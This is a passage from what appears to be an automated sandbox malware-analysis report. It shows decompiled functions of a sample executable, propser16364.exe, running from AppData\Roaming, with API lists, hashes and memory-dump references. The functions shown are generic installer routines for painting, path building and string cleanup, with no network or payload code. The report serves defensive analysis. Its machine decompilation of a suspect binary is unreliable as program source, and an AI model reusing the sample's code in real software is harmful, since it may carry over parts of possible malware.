                                                              0x00405f60
                                                              0x00405f3e
                                                              0x00405ebd
                                                              0x00405ec8
                                                              0x00405ed1
                                                              0x00405ed5
                                                              0x00000000
                                                              0x00000000
                                                              0x00405ed5
                                                              0x00406006

                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                                                              • GetShortPathNameA.KERNEL32 ref: 00405ED1
                                                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                              • GetShortPathNameA.KERNEL32 ref: 00405EEE
                                                              • wsprintfA.USER32 ref: 00405F0C
                                                              • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                                              • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                              • GlobalFree.KERNEL32(00000000), ref: 00405FF5
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405FFC
                                                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\AppData\Roaming\propser16364.exe,80000000,00000003), ref: 00405DC5
                                                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %s=%s$[Rename]$*B$.B$.B
                                                              • API String ID: 2171350718-3836630945
                                                              • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                              • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                                              • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                              • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                              0x0040100a
                                                              0x00401039
                                                              0x00401047
                                                              0x0040104d
                                                              0x00401051
                                                              0x0040105b
                                                              0x00401061
                                                              0x00401064
                                                              0x004010f3
                                                              0x00401089
                                                              0x0040108c
                                                              0x004010a6
                                                              0x004010bd
                                                              0x004010cc
                                                              0x004010cf
                                                              0x004010d5
                                                              0x004010d9
                                                              0x004010e4
                                                              0x004010ed
                                                              0x004010ef
                                                              0x004010ef
                                                              0x00401100
                                                              0x00401105
                                                              0x0040110d
                                                              0x00401110
                                                              0x00401112
                                                              0x00401118
                                                              0x0040111f
                                                              0x00401126
                                                              0x00401130
                                                              0x00401142
                                                              0x00401156
                                                              0x00401160
                                                              0x00401165
                                                              0x00401165
                                                              0x00401110
                                                              0x0040116e
                                                              0x00000000
                                                              0x00401178
                                                              0x00401010
                                                              0x00401013
                                                              0x00401015
                                                              0x0040101f
                                                              0x0040101f
                                                              0x00000000

                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32 ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                              • Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
                                                              • Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
                                                              • Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 72%
                                                              			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x501c89
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}



























                                                              0x004062bb
                                                              0x004062bb
                                                              0x004062bb
                                                              0x004062c1
                                                              0x004062c6
                                                              0x004062c8
                                                              0x004062d7
                                                              0x004062d7
                                                              0x004062df
                                                              0x004062e0
                                                              0x004062e1
                                                              0x004062e2
                                                              0x004062e5
                                                              0x004062ed
                                                              0x004062ef
                                                              0x00406306
                                                              0x00406309
                                                              0x00406309
                                                              0x004064e0
                                                              0x004064e0
                                                              0x004064e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00406316
                                                              0x0040631c
                                                              0x00000000
                                                              0x00000000
                                                              0x00406322
                                                              0x00406323
                                                              0x00406326
                                                              0x00406329
                                                              0x004064d3
                                                              0x004064dd
                                                              0x004064df
                                                              0x004064df
                                                              0x004064d5
                                                              0x004064d7
                                                              0x004064d9
                                                              0x004064da
                                                              0x004064da
                                                              0x00000000
                                                              0x004064d3
                                                              0x0040632f
                                                              0x00406333
                                                              0x00406343
                                                              0x0040634a
                                                              0x0040634d
                                                              0x00406355
                                                              0x00406358
                                                              0x0040635f
                                                              0x00406360
                                                              0x00406363
                                                              0x00406480
                                                              0x00406483
                                                              0x004064b3
                                                              0x004064b6
                                                              0x004064bb
                                                              0x004064bf
                                                              0x004064bf
                                                              0x004064c4
                                                              0x004064ca
                                                              0x004064cc
                                                              0x00000000
                                                              0x004064cc
                                                              0x00406485
                                                              0x00406488
                                                              0x0040649d
                                                              0x004064a4
                                                              0x0040648a
                                                              0x00406491
                                                              0x00406491
                                                              0x004064ac
                                                              0x004064af
                                                              0x00406478
                                                              0x00406479
                                                              0x00406479
                                                              0x00000000
                                                              0x004064af
                                                              0x00406369
                                                              0x00406370
                                                              0x00406372
                                                              0x00406373
                                                              0x0040638d
                                                              0x0040638d
                                                              0x00406394
                                                              0x00406394
                                                              0x0040639b
                                                              0x0040639f
                                                              0x0040639f
                                                              0x004063a0
                                                              0x004063a2
                                                              0x004063db
                                                              0x004063de
                                                              0x004063ee
                                                              0x004063f1
                                                              0x004063f9
                                                              0x004063ff
                                                              0x004063ff
                                                              0x0040645e
                                                              0x0040645e
                                                              0x00406460
                                                              0x00000000
                                                              0x00000000
                                                              0x00406403
                                                              0x0040640a
                                                              0x0040640b
                                                              0x0040640d
                                                              0x00406427
                                                              0x00406435
                                                              0x0040643b
                                                              0x0040643d
                                                              0x0040645b
                                                              0x0040645b
                                                              0x0040645b
                                                              0x00000000
                                                              0x0040645b
                                                              0x00406443
                                                              0x0040644c
                                                              0x0040644f
                                                              0x00406455
                                                              0x00406459
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406459
                                                              0x0040640f
                                                              0x00406412
                                                              0x00000000
                                                              0x00000000
                                                              0x00406421
                                                              0x00406423
                                                              0x00406425
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406425
                                                              0x00000000
                                                              0x0040645e
                                                              0x004063e6
                                                              0x00000000
                                                              0x004063a4
                                                              0x004063bf
                                                              0x004063c4
                                                              0x004063c7
                                                              0x00406467
                                                              0x00406467
                                                              0x0040646b
                                                              0x00406473
                                                              0x00406473
                                                              0x00000000
                                                              0x0040646b
                                                              0x004063d1
                                                              0x00406462
                                                              0x00406462
                                                              0x00406465
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406465
                                                              0x004063a2
                                                              0x00406375
                                                              0x00406379
                                                              0x00000000
                                                              0x00000000
                                                              0x0040637b
                                                              0x0040637f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406381
                                                              0x00406385
                                                              0x00000000
                                                              0x00406387
                                                              0x00406387
                                                              0x00000000
                                                              0x00406387
                                                              0x00406385
                                                              0x004064ea
                                                              0x004064f4
                                                              0x00406500
                                                              0x00406500
                                                              0x00000000

                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004063E6
                                                              • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                                              • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?), ref: 00406435
                                                              • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                                              • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                              • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                                              • API String ID: 717251189-2520582795
                                                              • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                              • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                                              • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                                              • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                              0x00406505
                                                              0x0040650d
                                                              0x00406521
                                                              0x00406521
                                                              0x00406527
                                                              0x00406534
                                                              0x00406534
                                                              0x00406535
                                                              0x00406537
                                                              0x0040653b
                                                              0x0040653d
                                                              0x00406546
                                                              0x00406548
                                                              0x00406562
                                                              0x0040656a
                                                              0x0040656a
                                                              0x0040656f
                                                              0x00406571
                                                              0x00406573
                                                              0x00406577
                                                              0x00406578
                                                              0x0040657b
                                                              0x00406583
                                                              0x00406585
                                                              0x00406589
                                                              0x00000000
                                                              0x00000000
                                                              0x0040658f
                                                              0x00406594
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406594
                                                              0x00406599

                                                              APIs
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
                                                              • "C:\Users\user\AppData\Roaming\propser16364.exe", xrefs: 0040653F
                                                              • *?|<>/":, xrefs: 0040654B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\AppData\Roaming\propser16364.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-470316254
                                                              • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                              • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                                              • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                              • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                              0x00404325
                                                              0x004043db
                                                              0x00000000
                                                              0x004043db
                                                              0x00404336
                                                              0x0040433a
                                                              0x00000000
                                                              0x00404354
                                                              0x00404354
                                                              0x0040435d
                                                              0x00000000
                                                              0x00000000
                                                              0x0040435f
                                                              0x0040436b
                                                              0x0040436e
                                                              0x0040436e
                                                              0x00404374
                                                              0x0040437a
                                                              0x0040437a
                                                              0x00404386
                                                              0x0040438c
                                                              0x00404393
                                                              0x00404396
                                                              0x00404399
                                                              0x0040439b
                                                              0x0040439b
                                                              0x004043a3
                                                              0x004043a9
                                                              0x004043a9
                                                              0x004043b3
                                                              0x004043b8
                                                              0x004043bb
                                                              0x004043c0
                                                              0x004043c3
                                                              0x004043c3
                                                              0x004043d3
                                                              0x004043d3
                                                              0x00000000
                                                              0x004043d6

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                              • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                              • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                              0x00405355
                                                              0x00405361
                                                              0x00405364
                                                              0x0040536a
                                                              0x00405376
                                                              0x00405379
                                                              0x0040537c
                                                              0x00405382
                                                              0x00405382
                                                              0x00405388
                                                              0x00405390
                                                              0x00405393
                                                              0x004053b0
                                                              0x004053b4
                                                              0x004053bd
                                                              0x004053bd
                                                              0x004053c7
                                                              0x004053d0
                                                              0x004053dc
